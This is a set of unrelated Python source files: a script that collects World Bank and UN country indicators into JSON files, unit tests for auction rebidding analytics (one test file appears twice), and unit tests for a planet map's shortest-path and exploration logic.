self.label = label
self.alias = alias or type.lower()
self.unit = unit
self.wdi_code = wdi_code
self.wdi_scale = wdi_scale
self.un_code = un_code
self._wdi = None
self._un = None
def load_wdi(self):
if not self.wdi_code:
raise ValueError('{}: no associated WDI variable'.format(self.label))
fname = os.path.join(datasets, 'wdi', self.wdi_code+'.csv')
try:
timeseries = pd.read_csv(fname, index_col=('Country','Year'))[self.wdi_code]
except:
# NOTE: mrv=1 for most recent value would be equivalent to subsequent treatment
# ....: except that sometimes it results to NaN (e.g CO2 emissions for PSE, Palestine)
timeseries = wb.get_series(self.wdi_code, id_or_value='id', simplify_index=True)
timeseries.to_csv(fname)
return timeseries
# lazy loading
@property
def wdi(self):
if self._wdi is None:
self._wdi = self.load_wdi()
return self._wdi
@property
def un(self):
if not self.un_code:
raise ValueError('{}: no associated UN variable'.format(self.label))
if self._un is None:
self._un = json.load(os.path.join(datasets, 'countryprofiledata.json'))
return self._un
def get_wdi(self, country_code):
try:
value = self.wdi.loc[country_code].dropna().values[-1]*self.wdi_scale
except:
value = float('nan')
logging.warning('no valid WDI value for {},{}'.format(country_code, self.wdi_code))
return value
def get_un(self, country_code):
try:
return self.un[country_code][self.un_code]
except:
logging.warning('no valid UN value for {},{}'.format(country_code, self.un_code))
return float('nan')
def get(self, country_code):
if self.wdi_code:
return self.get_wdi(country_code)
elif self.un_code:
return self.get_un(country_code)
raise ValueError('no method provided')
def to_dict(self, value, rank=None):
return {
'type': self.type,
'label': self.label,
'unit': self.unit,
'value': value,
'rank': rank,
'un_code': self.un_code,
'wdi_code': self.wdi_code,
}
# https://data.worldbank.org/indicator/AG.SRF.TOTL.K2
# AG.LND.TOTL.K2 : land area !
stats_variables = [
Variable('POP_TOTL', label='Total population', unit='million people', alias='pop_total', wdi_code='SP.POP.TOTL', wdi_scale=1e-6),
Variable('POP_DNST', label='Population density', unit='people/sq. km', alias='pop_density', wdi_code='EN.POP.DNST'),
Variable('RUR_POP_PRCT', label='Rural population', unit='% of total population', alias='pop_rural', wdi_code='SP.RUR.TOTL.ZS'),
Variable('URB_POP_PRCT', label='Urban population', unit='% of total population', alias='pop_urban', wdi_code='SP.URB.TOTL.IN.ZS'),
Variable('POP_GROWTH', label='Population growth', unit='% per year', alias='pop_growth', wdi_code='SP.POP.GROW'),
Variable('SURFACE_AREA', label='Surface area', unit='sq. km', alias='area', wdi_code='AG.SRF.TOTL.K2'),
Variable('GDP_PPP', label='Gross Domestic Product, PPP', unit='billion $ (PPP, current)', alias='gdp_ppp', wdi_code='NY.GDP.MKTP.PP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA_PPP', label='GDP per capita, PPP', unit='$ (PPP, current)', alias='gdp_capita_ppp', wdi_code='NY.GDP.PCAP.PP.CD'),
Variable('GDP', label='Gross Domestic Product', unit='billion $ (current)', alias='gdp', wdi_code='NY.GDP.MKTP.CD', wdi_scale=1e-9),
Variable('GDP_PER_CAPITA', label='GDP per capita', unit='$ (current)', alias='gdp_capita', wdi_code='NY.GDP.PCAP.CD'),
Variable('GDP_GROWTH', label='GDP growth', unit='annual %', alias='gdp_growth', wdi_code='NY.GDP.MKTP.KD.ZG'),
Variable('POV_DDAY', label='Poverty headcount rank at $ 1.90 a day (2011 PPP)', unit='% of total population', alias='poverty', wdi_code='SI.POV.DDAY'),
# Variable('CO2_EM_CAPITA', label='CO2 emissions per capita', unit='metric tons/capita', alias='co2_capita', wdi_code='EM.ATM.CO2E.PC'),
Variable('CO2_EM', label='CO2 emissions', unit='kt', alias='co2', wdi_code='EN.ATM.CO2E.KT'),
Variable('CO2_EM_INTENSITY', label='CO2 intensity', unit='kg per kg of oil equivalent energy use', wdi_code='EN.ATM.CO2E.EG.ZS'),
Variable('CO2_EM_GDP', label='CO2 emissions per GDP', unit='kg per 2011 PPP $ of GDP', wdi_code='EN.ATM.CO2E.PP.GD.KD'),
Variable('HDI', label='Human Development Index', unit='(-)', un_code='HDI_Human_development_index_HDIg_value'),
]
class CountryStats:
"""This is the class for the corresponding json file in country_data
"""
def __init__(self, name, type="country", sub_countries=[], code=None, stats=None):
self.name = name
self.type = type
self.code = code
self.sub_countries = sub_countries
self.stats = stats or []
def get(self, name, insert=False):
try:
i = [e['type'] for e in self.stats].index(name)
return self.stats[i]
except ValueError:
if insert:
e = {'type': name}
self.stats.append(e)
return e
else:
raise
def getvalue(self, name, missing=float('nan')):
try:
return self.get(name)['value']
except ValueError:
return missing
@classmethod
def load(cls, fname):
js = json.load(open(fname))
code = os.path.basename(os.path.dirname(fname))
return cls(js['name'], js.get('type', 'country'), js.get('sub-countries',[]), code=js.get('code', code), stats=js.get('stats', []))
def save(self, fname):
cdir = os.path.dirname(fname)
if not os.path.exists(cdir):
logging.info('create '+repr(cdir))
os.makedirs(cdir)
js = {
'name': self.name,
'code': self.code,
'type': self.type,
'sub-countries': self.sub_countries,
'stats': self.stats,
}
json.dump(js, open(fname, 'w'))
def __repr__(self):
return 'CountryStats({name}, {code})'.format(**vars(self))
class CountryStatDB:
def __init__(self, countries=None):
self.countries = countries or {}
@staticmethod
def cpath(code):
return os.path.join(country_data_path, code, '{}_general.json'.format(code))
@classmethod
def load(cls):
db = cls()
for root, codes, _ in glob.glob(country_data_path):
break
for c in codes:
cpath = os.path.join(country_data_path, c, '{}_general.json'.format(c))
try:
cstat = CountryStats.load(cpath)
except Exception as error:
logging.warning(str(error))
continue
db.countries[c] = stat
return db
def save(self):
for c, cstat in self.countries.items():
cpath = self.cpath(c)
cstat.save(cpath)
def main():
import argparse
parser = argparse.ArgumentParser()
x = parser.add_mutually_exclusive_group()
x.add_argument('--countries', nargs='+')
x.add_argument('--folder', action='store_true', help='read country codes from country_data folder')
# x.add_argument('--netcdf', '--nc', action='store_true', help='read country codes from default countrymasks.nc')
x.add_argument('--mask-file', help='read country code from netcdf mask file')
# x.add_argument('--shape-file', help='read country code from geojson shape file')
o = parser.parse_args()
wbcountries = wb.get_countries()
if o.countries:
codes = o.countries
elif o.mask_file:
with nc.Dataset(os.path.join(o.mask_file)) as ds:
codes = [v[2:] for v in ds.variables if v.startswith('m_')]
elif o.folder:
for root, codes, _ in os.walk(country_data_path):
break
else:
v = stats_variables[0]
codes = sorted(set(c for c, y in v.wdi.index))
countries = {}
for code in codes:
wbcode = 'WLD' if code == 'world' else code
if wbcode in wbcountries.index:
name = wbcountries.loc[wbcode]['name']
else:
logging.warning('{} not present in World Bank Database'.format(code))
logging.info('try countrymasks.nc')
try:
with nc.Dataset(os.path.join(countrymasks, 'countrymasks.nc')) as ds:
name = ds['m_'+code].long_name
except:
logging.warning('{} not present in countrymasks.nc'.format(code))
logging.warning('skip {}'.format(code))
continue
stats = [v.to_dict(v.get(wbcode)) for v in stats_variables]
countries[code] = CountryStats(name, code=code, type='country', sub_countries=[], stats=stats)
db = CountryStatDB(countries)
db.save()
if __name__ == '__main__':
main() | 0.484136 | 0.189371 |
import os
import numpy as np
from numpy.testing import TestCase, assert_array_almost_equal, \
assert_almost_equal
from parameterized import parameterized
from ..rebidding import (
MultistageAuctionData, MultistageIsNonCompetitive,
RefinedMultistageData, RefinedMultistageIsNonCompetitive,
RefinedMultistageEnvironment, refined_moment_matrix,
RefinedMultistageSolver, IteratedRefinedMultistageSolver,
ParallelRefinedMultistageSolver, EfficientMultistageIsNonCompetitive)
from ..auction_data import _read_bids, FilterTies
from ..environments import MarkupConstraint
from .test_analytics import is_distribution
def _load_multistage_data():
path = os.path.join(
os.path.dirname(__file__), 'reference_data', 'tsuchiura_data.csv')
raw_data = _read_bids(path)
raw_data['reserveprice'] *= .985
raw_data['norm_bid'] = raw_data['bid'] / raw_data['reserveprice']
return raw_data
class TestMultistageAuctionData(TestCase):
def setUp(self) -> None:
self.auctions = MultistageAuctionData(_load_multistage_data())
def test_second_round(self):
assert_almost_equal(
self.auctions.share_second_round, 0.11912865)
def test_raise_error(self):
self.assertRaises(NotImplementedError,
self.auctions.get_share_marginal,
self.auctions.df_bids, .1)
def test_share_marginal(self):
assert_almost_equal(
self.auctions.get_share_marginal(
self.auctions.df_bids, -.02), 0.08492171)
def test_share_marginal_cont(self):
assert_almost_equal(
self.auctions.share_marginal_cont(self.auctions.df_bids, -.02),
0.08492171)
def test_share_marginal_info(self):
assert_almost_equal(
self.auctions.share_marginal_info(self.auctions.df_bids, -.01),
0.0238257)
def test_get_counterfactual_demand(self):
assert_array_almost_equal(
[self.auctions.get_counterfactual_demand(r) for r in [-.05, .05]],
[0.775868, 0.02067733151])
class TestRefinedMultistageData(TestCase):
def setUp(self) -> None:
self.data = RefinedMultistageData(_load_multistage_data())
@parameterized.expand((
[-.01, [0.4954901, 0.0597345, 0.0238257]],
[.01, 0.10534377127297481]
))
def test_get_counterfactual_demand(self, rho, expected):
assert_almost_equal(
self.data.get_counterfactual_demand(rho), expected
)
def test_assemble_target_moments(self):
assert_array_almost_equal(
self.data.assemble_target_moments([-.01, 0, .005]),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
assert_array_almost_equal(
self.data.assemble_target_moments(
[-.01, 0, .005], self.data.df_bids),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
def test_filter(self):
filter_ties = FilterTies(.0001)
assert np.sum(filter_ties.get_ties(self.data)) == 61
assert filter_ties(self.data).df_bids.shape == (5815, 7)
assert isinstance(filter_ties(self.data), RefinedMultistageData)
def test_bootstrap(self):
demand_sample = self.data.bootstrap_demand_sample([-.01, 0, .005], 3)
assert demand_sample.shape == (3, 5)
assert_array_almost_equal(
demand_sample.round(2),
[[0.5, 0.06, 0.02, 0.25, 0.17],
[0.49, 0.06, 0.02, 0.24, 0.18],
[0.49, 0.06, 0.02, 0.24, 0.17]]
)
class TestMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.5, .4, .3, .8])
@parameterized.expand([
[[-.03, .02], [[0.085, 0.08, 0.066], [-.0075]]],
[[-.02, .02], [[0.09, 0.08, 0.066], [-.005]]],
[[-.2, .0, .02], [[0., 0.08, 0.066], [-.05]]]
])
def test_payoff_penalty(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(
metric._get_payoffs(self.env), expected[0])
assert_array_almost_equal(
metric._get_penalty(self.env), expected[1])
@parameterized.expand([
[[-.03, .02], 0],
[[-.02, .02], 1],
[[-.2, .0, .02], 0],
[[.01, .02], 0]
])
def test_ic(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(metric(self.env), expected)
class TestRefinedMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.6, .1, .05, .3, .15, .95])
self.metric_type = RefinedMultistageIsNonCompetitive
@parameterized.expand([
[[-.01, .01], [0.018375, 0.015, 0.009]],
[[-.01, 0, .01], [0.018375, 0.015, 0.009]],
[[-.05, .02], [-0.003125, 0.015, 0.0105]],
[[-.05, .1], [-0.003125, 0.015, 0.0225]]
])
def test_payoffs(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric._get_payoffs(self.env), expected)
@parameterized.expand([
[[-.01, .01], 1],
[[-.01, 0, .01], 1],
[[-.05, .02], 0],
[[-.05, .1], 1]
])
def test_ic(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric(self.env), expected)
def test_raise_error(self):
self.assertRaises(
ValueError, self.metric_type, [-.1, -.01, 0, .1])
self.assertRaises(
ValueError, self.metric_type, [-.1, .01, 0, .1])
class TestEfficientMultistageIsNonCompetitive(TestCase):
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199], [0.958, np.NAN, 0.801]],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199], [0.958, np.NAN, 1]],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199], [0, np.NAN, .801]],
[[-.02, 0, .001], [.4, .1, .1, .2, .199], [0.87, np.NAN, .801]],
[[-.02, 0, .001], [.37, .1, .1, .2, .199], [0.705, np.NAN, .801]]
])
def test_penalized_payoff_bounds(self, deviations, beliefs, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert_array_almost_equal(metric._get_cost_bounds(beliefs), expected)
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199, .5], 1],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199, .5], 0],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199, .5], 0],
[[-.02, 0, .001], [.4, .1, .1, .2, .199, .5], 1],
[[-.02, 0, .001], [.37, .1, .1, .2, .199, .5], 0]
])
def test_is_non_competitive(self, deviations, env, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert metric(env) == expected
class TestRefinedMultistageEnvironment(TestCase):
def setUp(self):
self.env = RefinedMultistageEnvironment(num_actions=2)
def test_private_generate_raw_environments(self):
assert_array_almost_equal(
self.env._generate_raw_environments(3, 1).round(2),
[[0.72, 0.16, 0.06, 0.42, 0., 0.67],
[0.3, 0.07, 0.61, 0.15, 0.09, 0.42],
[0.4, 0.04, 0.02, 0.35, 0.19, 0.56]]
)
def test_refined_moment_matrix():
assert_array_almost_equal(
refined_moment_matrix(),
np.array([
[1, 0, 0, 0, 0],
[1, -1, 0, -1, 0],
[0, -1, 1, 0, 0],
[-1, 0, 0, 1, 0],
[0, 0, 0, -1, 1]
]))
assert_array_almost_equal(
refined_moment_matrix(False), np.identity(5))
class TestRefinedSolvers(TestCase):
def setUp(self) -> None:
filter_ties = FilterTies(.0001)
markup_constraint = MarkupConstraint(.5, .02)
self.data = filter_ties(RefinedMultistageData(_load_multistage_data()))
args = (self.data, [-.02, 0, .002],
RefinedMultistageIsNonCompetitive, [markup_constraint])
kwargs = dict(
num_points=1e3, seed=0, project=False,
filter_ties=filter_ties, moment_matrix=None, moment_weights=None,
confidence_level=.95)
self.solver = RefinedMultistageSolver(*args, **kwargs)
self.parallel_solver = ParallelRefinedMultistageSolver(*args, **kwargs)
kwargs['num_evaluations'] = 10
self.iter_solver = IteratedRefinedMultistageSolver(*args, **kwargs)
def test_moment_matrix(self):
assert_array_almost_equal(
self.solver._moment_matrix, refined_moment_matrix())
assert_array_almost_equal(
self.solver._moment_weights, 5 * [1])
def test_tolerance(self):
assert_almost_equal(
self.solver.tolerance, 0.0003502449)
def test_generate_env_perf(self):
assert_array_almost_equal(
self.solver._env_with_perf[:3].round(2),
[[0.83, 0.12, 0.06, 0.09, 0.02, 0.76, 1.],
[0.77, 0.04, 0.04, 0.46, 0.26, 0.85, 1.],
[0.62, 0.03, 0.08, 0.57, 0.02, 0.79, 0.]])
def test_demand(self):
assert_array_almost_equal(
self.solver.demands,
[0.693981, 0.085297, 0., 0.250559, 0.239123])
def test_solution(self):
assert_almost_equal(
self.solver.result.solution, 0.751241, decimal=5)
def test_argmin_distribution(self):
assert is_distribution(self.solver.result.argmin['prob'])
def test_argmin(self):
cols = ['prob'] + self.solver.argmin_columns
df = self.solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.9, 1.],
[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.8, 1.]], decimal=1)
def test_iter(self):
assert_almost_equal(
self.iter_solver.result.solution, 0.271439, decimal=5)
def test_iter_argmin(self):
cols = ['prob'] + self.iter_solver.solver.argmin_columns
df = self.iter_solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[.59, .51, .09, .025, .13, .086, .98, 0.],
[.27, 1.0, .065, 0, .3, .29, .86, 1.]], decimal=1)
def test_parallel_solution(self):
assert_almost_equal(self.parallel_solver.result.solution, 0.30190327) | mb_api/tests/test_rebidding.py | import os
import numpy as np
from numpy.testing import TestCase, assert_array_almost_equal, \
assert_almost_equal
from parameterized import parameterized
from ..rebidding import (
MultistageAuctionData, MultistageIsNonCompetitive,
RefinedMultistageData, RefinedMultistageIsNonCompetitive,
RefinedMultistageEnvironment, refined_moment_matrix,
RefinedMultistageSolver, IteratedRefinedMultistageSolver,
ParallelRefinedMultistageSolver, EfficientMultistageIsNonCompetitive)
from ..auction_data import _read_bids, FilterTies
from ..environments import MarkupConstraint
from .test_analytics import is_distribution
def _load_multistage_data():
path = os.path.join(
os.path.dirname(__file__), 'reference_data', 'tsuchiura_data.csv')
raw_data = _read_bids(path)
raw_data['reserveprice'] *= .985
raw_data['norm_bid'] = raw_data['bid'] / raw_data['reserveprice']
return raw_data
class TestMultistageAuctionData(TestCase):
def setUp(self) -> None:
self.auctions = MultistageAuctionData(_load_multistage_data())
def test_second_round(self):
assert_almost_equal(
self.auctions.share_second_round, 0.11912865)
def test_raise_error(self):
self.assertRaises(NotImplementedError,
self.auctions.get_share_marginal,
self.auctions.df_bids, .1)
def test_share_marginal(self):
assert_almost_equal(
self.auctions.get_share_marginal(
self.auctions.df_bids, -.02), 0.08492171)
def test_share_marginal_cont(self):
assert_almost_equal(
self.auctions.share_marginal_cont(self.auctions.df_bids, -.02),
0.08492171)
def test_share_marginal_info(self):
assert_almost_equal(
self.auctions.share_marginal_info(self.auctions.df_bids, -.01),
0.0238257)
def test_get_counterfactual_demand(self):
assert_array_almost_equal(
[self.auctions.get_counterfactual_demand(r) for r in [-.05, .05]],
[0.775868, 0.02067733151])
class TestRefinedMultistageData(TestCase):
def setUp(self) -> None:
self.data = RefinedMultistageData(_load_multistage_data())
@parameterized.expand((
[-.01, [0.4954901, 0.0597345, 0.0238257]],
[.01, 0.10534377127297481]
))
def test_get_counterfactual_demand(self, rho, expected):
assert_almost_equal(
self.data.get_counterfactual_demand(rho), expected
)
def test_assemble_target_moments(self):
assert_array_almost_equal(
self.data.assemble_target_moments([-.01, 0, .005]),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
assert_array_almost_equal(
self.data.assemble_target_moments(
[-.01, 0, .005], self.data.df_bids),
[0.49549, 0.059735, 0.023826, 0.25017, 0.18065])
def test_filter(self):
filter_ties = FilterTies(.0001)
assert np.sum(filter_ties.get_ties(self.data)) == 61
assert filter_ties(self.data).df_bids.shape == (5815, 7)
assert isinstance(filter_ties(self.data), RefinedMultistageData)
def test_bootstrap(self):
demand_sample = self.data.bootstrap_demand_sample([-.01, 0, .005], 3)
assert demand_sample.shape == (3, 5)
assert_array_almost_equal(
demand_sample.round(2),
[[0.5, 0.06, 0.02, 0.25, 0.17],
[0.49, 0.06, 0.02, 0.24, 0.18],
[0.49, 0.06, 0.02, 0.24, 0.17]]
)
class TestMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.5, .4, .3, .8])
@parameterized.expand([
[[-.03, .02], [[0.085, 0.08, 0.066], [-.0075]]],
[[-.02, .02], [[0.09, 0.08, 0.066], [-.005]]],
[[-.2, .0, .02], [[0., 0.08, 0.066], [-.05]]]
])
def test_payoff_penalty(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(
metric._get_payoffs(self.env), expected[0])
assert_array_almost_equal(
metric._get_penalty(self.env), expected[1])
@parameterized.expand([
[[-.03, .02], 0],
[[-.02, .02], 1],
[[-.2, .0, .02], 0],
[[.01, .02], 0]
])
def test_ic(self, deviations, expected):
MultistageIsNonCompetitive.max_win_prob = .75
metric = MultistageIsNonCompetitive(deviations)
assert_array_almost_equal(metric(self.env), expected)
class TestRefinedMultistageIsNonCompetitive(TestCase):
def setUp(self):
self.env = np.array([.6, .1, .05, .3, .15, .95])
self.metric_type = RefinedMultistageIsNonCompetitive
@parameterized.expand([
[[-.01, .01], [0.018375, 0.015, 0.009]],
[[-.01, 0, .01], [0.018375, 0.015, 0.009]],
[[-.05, .02], [-0.003125, 0.015, 0.0105]],
[[-.05, .1], [-0.003125, 0.015, 0.0225]]
])
def test_payoffs(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric._get_payoffs(self.env), expected)
@parameterized.expand([
[[-.01, .01], 1],
[[-.01, 0, .01], 1],
[[-.05, .02], 0],
[[-.05, .1], 1]
])
def test_ic(self, deviations, expected):
metric = self.metric_type(deviations)
assert_array_almost_equal(metric(self.env), expected)
def test_raise_error(self):
self.assertRaises(
ValueError, self.metric_type, [-.1, -.01, 0, .1])
self.assertRaises(
ValueError, self.metric_type, [-.1, .01, 0, .1])
class TestEfficientMultistageIsNonCompetitive(TestCase):
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199], [0.958, np.NAN, 0.801]],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199], [0.958, np.NAN, 1]],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199], [0, np.NAN, .801]],
[[-.02, 0, .001], [.4, .1, .1, .2, .199], [0.87, np.NAN, .801]],
[[-.02, 0, .001], [.37, .1, .1, .2, .199], [0.705, np.NAN, .801]]
])
def test_penalized_payoff_bounds(self, deviations, beliefs, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert_array_almost_equal(metric._get_cost_bounds(beliefs), expected)
@parameterized.expand([
[[-.02, 0, .001], [.6, .1, .1, .2, .199, .5], 1],
[[-.02, 0, 1e-9], [.6, .1, .1, .2, .199, .5], 0],
[[-1e-9, 0, .001], [.6, .1, .1, .2, .199, .5], 0],
[[-.02, 0, .001], [.4, .1, .1, .2, .199, .5], 1],
[[-.02, 0, .001], [.37, .1, .1, .2, .199, .5], 0]
])
def test_is_non_competitive(self, deviations, env, expected):
metric = EfficientMultistageIsNonCompetitive(deviations)
metric.min_markup, metric.max_markup = .02, .5
assert metric(env) == expected
class TestRefinedMultistageEnvironment(TestCase):
def setUp(self):
self.env = RefinedMultistageEnvironment(num_actions=2)
def test_private_generate_raw_environments(self):
assert_array_almost_equal(
self.env._generate_raw_environments(3, 1).round(2),
[[0.72, 0.16, 0.06, 0.42, 0., 0.67],
[0.3, 0.07, 0.61, 0.15, 0.09, 0.42],
[0.4, 0.04, 0.02, 0.35, 0.19, 0.56]]
)
def test_refined_moment_matrix():
assert_array_almost_equal(
refined_moment_matrix(),
np.array([
[1, 0, 0, 0, 0],
[1, -1, 0, -1, 0],
[0, -1, 1, 0, 0],
[-1, 0, 0, 1, 0],
[0, 0, 0, -1, 1]
]))
assert_array_almost_equal(
refined_moment_matrix(False), np.identity(5))
class TestRefinedSolvers(TestCase):
def setUp(self) -> None:
filter_ties = FilterTies(.0001)
markup_constraint = MarkupConstraint(.5, .02)
self.data = filter_ties(RefinedMultistageData(_load_multistage_data()))
args = (self.data, [-.02, 0, .002],
RefinedMultistageIsNonCompetitive, [markup_constraint])
kwargs = dict(
num_points=1e3, seed=0, project=False,
filter_ties=filter_ties, moment_matrix=None, moment_weights=None,
confidence_level=.95)
self.solver = RefinedMultistageSolver(*args, **kwargs)
self.parallel_solver = ParallelRefinedMultistageSolver(*args, **kwargs)
kwargs['num_evaluations'] = 10
self.iter_solver = IteratedRefinedMultistageSolver(*args, **kwargs)
def test_moment_matrix(self):
assert_array_almost_equal(
self.solver._moment_matrix, refined_moment_matrix())
assert_array_almost_equal(
self.solver._moment_weights, 5 * [1])
def test_tolerance(self):
assert_almost_equal(
self.solver.tolerance, 0.0003502449)
def test_generate_env_perf(self):
assert_array_almost_equal(
self.solver._env_with_perf[:3].round(2),
[[0.83, 0.12, 0.06, 0.09, 0.02, 0.76, 1.],
[0.77, 0.04, 0.04, 0.46, 0.26, 0.85, 1.],
[0.62, 0.03, 0.08, 0.57, 0.02, 0.79, 0.]])
def test_demand(self):
assert_array_almost_equal(
self.solver.demands,
[0.693981, 0.085297, 0., 0.250559, 0.239123])
def test_solution(self):
assert_almost_equal(
self.solver.result.solution, 0.751241, decimal=5)
def test_argmin_distribution(self):
assert is_distribution(self.solver.result.argmin['prob'])
def test_argmin(self):
cols = ['prob'] + self.solver.argmin_columns
df = self.solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.9, 1.],
[0.2, 0.7, 0.1, 0., 0.3, 0.2, 0.8, 1.]], decimal=1)
def test_iter(self):
assert_almost_equal(
self.iter_solver.result.solution, 0.271439, decimal=5)
def test_iter_argmin(self):
cols = ['prob'] + self.iter_solver.solver.argmin_columns
df = self.iter_solver.result.argmin[cols]
assert_array_almost_equal(
df.iloc[:2],
[[.59, .51, .09, .025, .13, .086, .98, 0.],
[.27, 1.0, .065, 0, .3, .29, .86, 1.]], decimal=1)
def test_parallel_solution(self):
assert_almost_equal(self.parallel_solver.result.solution, 0.30190327) | 0.525856 | 0.591045 |
import unittest
from planet import *
class ExampleTestPlanet(unittest.TestCase):
    """Sanity checks on a small example map with a loop and blocked paths."""

    def setUp(self):
        """Build the example planet from a table of (start, end, weight) paths."""
        self.havok = Planet()
        paths = [
            (((15, 37), Direction.NORTH), ((15, 39), Direction.SOUTH), 1),
            # loop back onto the same node
            (((15, 39), Direction.NORTH), ((15, 39), Direction.WEST), 1),
            (((15, 39), Direction.EAST), ((16, 39), Direction.WEST), 1),
            (((15, 37), Direction.WEST), ((14, 39), Direction.SOUTH), 1),
            (((14, 39), Direction.WEST), ((13, 38), Direction.NORTH), 1),
            (((13, 38), Direction.SOUTH), ((13, 37), Direction.NORTH), 1),
            # blocked paths are encoded with weight -1
            (((15, 37), Direction.SOUTH), ((15, 37), Direction.SOUTH), -1),
            (((16, 39), Direction.NORTH), ((16, 39), Direction.NORTH), -1),
            (((17, 38), Direction.SOUTH), ((17, 37), Direction.NORTH), 1),
        ]
        for start, end, weight in paths:
            self.havok.add_path(start, end, weight)

    def test_empty_planet(self):
        """The planet built in setUp must expose a non-empty path map."""
        self.assertIsNotNone(self.havok.get_paths())
        self.assertNotEqual(self.havok.get_paths(), {})

    def test_target_not_reachable(self):
        """shortest_path yields None for targets with no route from (13, 37)."""
        for target in ((20, 38), (17, 38)):
            self.assertIsNone(self.havok.shortest_path((13, 37), target))
class shortestPathTestPlanet(unittest.TestCase):
    """Tests for Planet.shortest_path on a map with a weighted loop.

    One edge weight was deliberately raised to 2 so Dijkstra has a single
    predictable cheapest route.
    """

    def setUp(self):
        # set your data structure
        self.havok = Planet()
        self.havok.add_path(((15, 37), Direction.NORTH),
                            ((15, 39), Direction.SOUTH), 1)
        self.havok.add_path(((15, 37), Direction.EAST),
                            ((17, 37), Direction.WEST), 1)
        # loop
        self.havok.add_path(((15, 39), Direction.NORTH),
                            ((15, 39), Direction.WEST), 1)
        self.havok.add_path(((15, 39), Direction.EAST),
                            ((16, 39), Direction.WEST), 1)
        self.havok.add_path(((15, 37), Direction.WEST),
                            ((14, 39), Direction.SOUTH), 1)
        self.havok.add_path(((14, 39), Direction.WEST),
                            ((13, 38), Direction.NORTH), 1)
        self.havok.add_path(((13, 38), Direction.SOUTH),
                            ((13, 37), Direction.NORTH), 1)
        self.havok.add_path(((17, 38), Direction.SOUTH),
                            ((17, 37), Direction.NORTH), 1)
        # changed this weight to make dijkstra predictable
        self.havok.add_path(((17, 38), Direction.EAST),
                            ((17, 37), Direction.EAST), 2)
        self.havok.add_path(((16, 39), Direction.EAST),
                            ((17, 38), Direction.NORTH), 1)
        self.havok.add_path(((16, 39), Direction.SOUTH),
                            ((17, 38), Direction.WEST), 1)
        # blocked paths
        self.havok.add_path(((15, 37), Direction.SOUTH),
                            ((15, 37), Direction.SOUTH), -1)
        self.havok.add_path(((16, 39), Direction.NORTH),
                            ((16, 39), Direction.NORTH), -1)

    def test_shortest_path(self):
        """Dijkstra must pick the cheapest route from (13, 37) to (17, 38)."""
        # NOTE: removed leftover debug print() calls that cluttered the test
        # output and recomputed shortest_path without asserting anything.
        self.assertEqual(
            self.havok.shortest_path((13, 37), (17, 38)),
            [((13, 37), Direction.NORTH), ((13, 38), Direction.NORTH),
             ((14, 39), Direction.SOUTH), ((15, 37), Direction.EAST),
             ((17, 37), Direction.NORTH)])
class ExploringTestPlanet(unittest.TestCase):
    """Exploration helpers: unexplored-path queries on a partially known map."""

    def setUp(self):
        """Build the map from a table of known paths plus two unknown exits."""
        self.havok = Planet()
        known = [
            (((15, 37), Direction.NORTH), ((15, 39), Direction.SOUTH), 1),
            (((15, 37), Direction.EAST), ((17, 37), Direction.WEST), 1),
            (((15, 39), Direction.NORTH), ((15, 39), Direction.WEST), 1),
            (((15, 39), Direction.EAST), ((16, 39), Direction.WEST), 1),
            (((16, 39), Direction.EAST), ((17, 38), Direction.NORTH), 1),
            (((16, 39), Direction.SOUTH), ((17, 38), Direction.WEST), 1),
            (((17, 38), Direction.SOUTH), ((17, 37), Direction.NORTH), 1),
            (((17, 38), Direction.EAST), ((17, 37), Direction.EAST), 1),
            (((15, 37), Direction.WEST), ((14, 39), Direction.SOUTH), 1),
            (((14, 39), Direction.WEST), ((13, 38), Direction.NORTH), 1),
            (((13, 38), Direction.SOUTH), ((13, 37), Direction.NORTH), 1),
        ]
        for start, end, weight in known:
            self.havok.add_path(start, end, weight)
        # exits flagged as unexplored (-2) on two nodes
        unknown = [
            {(13, 37): [(Direction.SOUTH, -2)]},
            {(16, 39): [(Direction.NORTH, -2)]},
        ]
        for entry in unknown:
            self.havok.add_unknown_paths(entry)

    def test_go_direction(self):
        """Only nodes with an unexplored exit are worth going to."""
        self.assertTrue(self.havok.go_direction((13, 37)))
        self.assertFalse(self.havok.go_direction((15, 37)))

    def test_get_next_node(self):
        """get_next_node lists the outgoing choices toward unexplored ground."""
        expected_from_start = [((15, 37), Direction.NORTH),
                               ((15, 39), Direction.EAST)]
        self.assertEqual(self.havok.get_next_node((15, 37)),
                         expected_from_start)
